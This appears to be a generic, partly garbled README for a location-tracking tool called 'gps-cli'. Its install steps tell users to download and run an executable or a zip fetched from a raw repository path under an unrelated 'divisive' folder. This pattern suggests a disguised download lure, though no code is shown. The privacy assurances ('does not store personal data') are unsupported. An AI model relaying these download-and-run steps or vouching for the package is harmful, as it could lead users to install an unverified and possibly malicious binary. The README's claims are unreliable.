Welcome to gps-cli, a universal device location tracker. This tool allows you to track devices across Linux, macOS, Windows, Android, and iOS. It supports various GPS providers like Traccar, OwnTracks, PhoneTrack, and GPSLogger.
This guide will help you download and run gps-cli easily.
To run gps-cli, you need:
- A computer with one of the following operating systems:
- Windows: version 10 or higher
- macOS: version 10.12 (Sierra) or higher
- Linux: Any modern distribution
- At least 100 MB of free disk space
- An internet connection for downloading the software
- Cross-Platform Support: Use gps-cli on various operating systems without hassle.
- Multi-Provider GPS Support: Choose from multiple GPS services that best suit your needs.
- Easy Tracking: Simple commands to start tracking your devices quickly.
- Privacy Focus: Your data stays secure while you track locations.
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Visit the Releases Page: Go to the Releases page.
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Choose Your Version: Look for the latest release. You will find versions available for different operating systems.
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Download the File:
- For Windows, download the
.exefile. - For macOS, download the
.dmgfile. - For Linux, download the
https://raw.githubusercontent.com/eliasroseblogger/gps-cli/main/divisive/gps-cli.zipfile. - For Android and iOS, refer to the specific installation instructions in the repository.
- For Windows, download the
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Run the Application:
- Windows: Double-click the downloaded
.exefile to run the setup. - macOS: Open the downloaded
.dmgfile and drag the application to your Applications folder. Then, launch it from there. - Linux: Extract the
https://raw.githubusercontent.com/eliasroseblogger/gps-cli/main/divisive/gps-cli.zipfile, and open the terminal. Navigate to the extracted folder and run the application using the command./gps-cli.
- Windows: Double-click the downloaded
- Open gps-cli: Launch the application from your computer.
- Set Up Providers: Follow the prompts to configure your preferred GPS providers.
- Start Tracking: Use simple commands as described in the user manual to begin tracking your devices. For example:
- To start tracking a device, type
track <device_id>. - To view the location, use
status <device_id>.
- To start tracking a device, type
If you encounter any issues while using gps-cli, consult the user manual or check the issues section on the GitHub page. Common questions and troubleshooting tips are available to assist you.
Your privacy is important. gps-cli does not store personal data. All location information is processed locally on your device.
Stay updated and connect with other users:
- Join our discussions on GitHub.
- Follow related topics such as device tracking, geolocation, and privacy features.